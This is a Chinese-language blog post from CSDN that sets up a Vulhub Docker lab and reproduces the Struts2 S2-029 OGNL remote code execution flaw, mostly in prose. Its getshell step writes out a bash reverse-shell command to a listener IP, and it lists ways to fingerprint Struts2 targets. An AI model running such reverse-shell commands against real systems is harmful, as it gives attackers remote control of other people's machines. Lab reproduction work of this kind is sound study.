框架漏洞-->Struts2 &&Docker_Vulnhub搭建

已于 2024-03-03 02:12:25 修改
阅读量1.4k 收藏 19
点赞数 16
文章标签: 框架漏洞 Struts2
于 2024-03-03 02:11:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huohaowen/article/details/136425203
版权
本文详细介绍了如何使用Docker搭建Vulnhub环境,复现Struts2的S2-029远程代码执行漏洞,并演示了RCE和Getshell的过程。Struts2作为流行的JavaWeb框架,其动态特性可能导致安全风险,本文提供了实用的漏洞利用步骤和安全建议。
摘要由CSDN通过智能技术生成

来浅浅的讲一下Struts2漏洞

目录

1.Docker_Vulnhub搭建

2.Struts2

3.Struts2的框架特征

4.S2-029-->Remote Code Execution

5.漏洞复现

1.RCE

2.Getshell

1.Docker_Vulnhub搭建

因为我用的是Linux,所以我选择直接搭个docker,这里我建议先换个源

vim /etc/apt/sources.list

我用的清华源

deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

换完之后记得更新一下

sudo apt update

然后就可以装我们的docker啦!!!

sudo apt install docker.io

然后就是安装docker-compose

sudo apt-get  install docker-compose

下载vulnhub

git clone https://github.com/vulhub/vulhub.git 
//如果上面这个太慢的话,可以试试下面这个

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip

unzip vulhub-master.zip

然后就是开启docker环境

sudo systemctl start docker

 然后可以去查看一下

然后今天我们要复现的 s2-029在vulnhub里面没有,所以需要我们自己去拉取

docker pull medicean/vulapps:s_struts2_s2-029

 然后去启动漏洞环境

docker run -d -p 8081:8080 medicean/vulapps:s_struts2_s2-029

然后你就会发现网卡信息那里多了一栏

然后我们用本机的环境去访问 kali的ip:8080/default.action

访问成功,环境搭建成功

2.Struts2

Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联
网、政府、企业门户网站。用的java语言开发 
漏洞介绍:
Struts2漏洞是一个经典的漏洞系列,根源在于Struts2 引入了OGNL表达式使得框架
具有灵活的动态性 。随着整体框架的补丁完善,现在想挖掘新的Struts2漏洞会比以前
困难很多,从实际了解的情况来看,大部分用户早就修复了历史的高危漏洞。目前在
做渗透测试时,Struts2漏洞主要也是碰碰运气,或者是打到内网之后用来攻击没打补
丁的系统会比较有效。

3.Struts2的框架特征

Struts2 框架特征
查看被测应用系统的源码, URL 接口地址以 .action ” “ .do 结尾或地址中包含 ! 符号,或者在被测应用的服务器上查看 应用所在目录/WEB-INF/lib/下的jar文件,若存在struts2-core-
2.*.**.jar或xwork-core-2.*.**.jar格式的jar文件 ,则需检测是否 存在Struts2 远程代码执行漏洞。

4.S2-029-->Remote Code Execution

rce的原理

Struts2的动态性在于ongl表达式可以获取到运行变量的值,并且有机会执行函数调用
。如果可以把恶意的请求参数送到ognl的执行流程中,就会导致任意代码执行漏洞。

5.漏洞复现

1.RCE

这里我就直接用漏扫了 

于是就对应的去利用

看见是能成功rce的!!!

2.Getshell

能不能getshell呢,废话,都能rce了,肯定能getshell啊!!!

先去开一下netcat

然后就是反向连接弹shell了

/bin/bash -c   "bash -i  >& /dev/tcp/192.168.246.1/9191 0>&1 "

这样就是成功的getshell了!!!

当然了,这个有没有手工的poc呢?? 肯定是有,不过很长 

最后养成好习惯,关闭docker环境

docker-compose down  //如果是上面的环境的话,就要走以下命令
sudo systemctl stop docker
sudo systemctl stop docker.socket
sudo systemctl status docker //最后查看一下环境是否关闭

Whoami@127.0.0.1
关注
  • 16
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Strtus2漏洞复现
G3et的博客
06-04 205
Apache Struts 1插件的Apache Struts 2.3.x 版本存在远程代码执行漏洞,该漏洞出现于Struts2的某个类,该类是为了将Struts1的Action包装成为Struts2的Action,以保证Struts2Struts1插件启用的情况下,远程攻击者可通过使用恶意字段值,构造特定的输入,发送到ActionMessage类,从而导致任意命令执行,进而获取目标主机系统权限。
Docker 搭建 Vulnhub 靶场环境
白帽渗透笔记的博客
08-11 6905
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 今天我们来讲一下如何使用 Docker 来启动 Vulnhub 上的靶场。 首先需要准备一台虚拟机,我用的是 CentOS7 的虚拟机,1 核 4 G 内存 60G 硬盘,为了靶场运行流畅一点,就多给了一点内存,直接给了 4 G。 首先需要安
Vulnhub系列】docker_containement
大方子
10-02 1439
=========================== 个人收获: 1.利用reGeorg+Proxifier进行内网渗透 2.学会wpscan 3.学会了Docker Remote api ============================= 下载地址:https://download.vulnhub.com/vulnerabledocker/ 靶机总共...
docker搭建vulhub靶场
weixin_55554070的博客
08-27 1024
近期自己想本地搭建一个靶场去多多练习漏洞理解漏洞原理,就在找资料docker搭建vulhub靶场。前面走过很多弯路,想在kali上搭建,但一直都搭建不起,就放弃了。kali出现的问题是公钥连接不上服务器(也有可能是自己kali版本的问题2019年的,太懒就没有重新安装),看了很多文章也没解决,就换成了centos7了,参考文章按照步骤来安装成功。 参考链接:https://www.jianshu.com/p/8264936cac30 步骤一:确定centos7能上网 步骤二:安装docker需要先
vulhubdocker安装(全步骤)
ST0new的博客
09-06 8862
目录vulhub介绍安装安装环境安装步骤更新源安装pip安装docker安装docker-compose下载环境部署系统环境 vulhub介绍 Vulhub是一个基于dockerdocker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 安装 安装环境 ubuntu 16.04 纯净版 更新源: ...
基于RedHat——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于RedHat系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
基于Ubuntu——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于Ubuntu系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
docker-build-push:Docker Build&Push GitHub操作
05-08
Docker构建和推送操作 构建一个Docker映像并将其推送到您选择的私有注册表。 支持的Docker注册表 Docker集线器 Google Container Registry(GCR) AWS Elastic Container Registry(ECR) GitHub Docker注册表 ...
docker17.12.1&nvidia-docker2-2.0.3_rpm.zip
03-01
docker17.12.1以及nvidia-docker2-2.0.3_rpm
docker_exporter:导出有关Docker安装的指标
02-04
快速开始给定具有默认配置Docker安装(在Unix管道上侦听): 通过执行以下命令来启动导出器: docker run --name docker_exporter --detach --restart always --volume "/var/run/docker.sock":"/var/run/docker....
centos7上docker搭建vulhub靶场
最新发布
weixin_45653478的博客
04-12 1257
VulHub是一个在线靶场平台,提供了丰富的漏洞环境供安全爱好者学习和实践。该平台主要面向网络安全初学者和进阶者,通过模拟真实的漏洞环境,帮助用户深入了解漏洞的成因、利用方式以及防范措施。此外,VulHub还提供了丰富的教程和文档,方便用户快速上手并深入学习。
docker环境下安装使用vulhub靶场
Goodric的博客
07-25 1652
Vulhub是一个基于dockerdocker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。docker-compose会自动查找当前目录下的配置文件(默认文件名为docker-compose.yml),并根据其内容编译镜像和启动容器。所以,要运行某个漏洞靶场,需要先进入该漏洞所在的目录。首先要在Linux有和环境,安装过程这里就不讲述了。——...
docker容器安装vulhub靶场环境
勤劳的码农的博客
03-11 1348
是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让对安全感兴趣的人员更加专注于漏洞原理本身。是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器,然后发布到任何流行的Linux机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。通过对应用组件的封装、分发、部署、运行等生命周期的管理,达到应用组件级别的“一次封装,到处运行”。
【甄选靶场】 Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)
人间体佐菲的博客
10-08 742
【甄选靶场】 Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)
CentOS7搭建Docker + Vulnhub靶场
weixin_44632787的博客
04-26 4769
CentOS 7 安装 Docker + Vulhub靶场教程
JSP:从入门到st2漏洞环境本地搭建
Namezzz的博客
03-14 2274
st2漏洞环境本地搭建
【网络安全 | Kali】基于Docker的Vulhub安装教程指南
等风来
01-02 3029
Vulhub搭建基于dockerdocker-compose权限升级新软件安装HTTPS协议和CA证书安装docker验证docker是否安装成功安装pip安装docker-compose查看安装的docker-compose版本 下载Vulhub文件 查看Vulhub漏洞靶场 切换到要启动的漏洞的目录
vulhub-struts2
bqnagus
10-03 994
vulhub-struts2 复现
如何搭建Struts2环境
qq_39093474的博客
08-27 268
第一步:加入jar包:把jar包加入到web应用的lib下面。 第二步:配置web.xml文件 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javae...
怎么将以下代码转换为yaml文件kubectl create secret docker-registry myregistrykey --docker-server=$DOCKER_REGISTRY_SERVER --docker-username=$DOCKER_USER --docker-password=$DOCKER_PASSWORD --docker-email=$DOCKER_EMAIL
06-02
你可以将以下代码转换为YAML文件: ```yaml apiVersion: v1 kind: Secret metadata: name: myregistrykey type: kubernetes.io/dockerconfigjson data: .dockerconfigjson: <base64-encoded-docker-config-json> ``` 其,`<base64-encoded-docker-config-json>` 是你的 Docker 配置信息的 Base64 编码。可以通过以下命令获取: ```bash cat ~/.docker/config.json | base64 ``` 然后将输出结果填入 `.dockerconfigjson` 字段即可。注意,这里的 `type` 必须为 `kubernetes.io/dockerconfigjson`,因为我们要创建一个 Docker 镜像仓库的认证信息 Secret。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值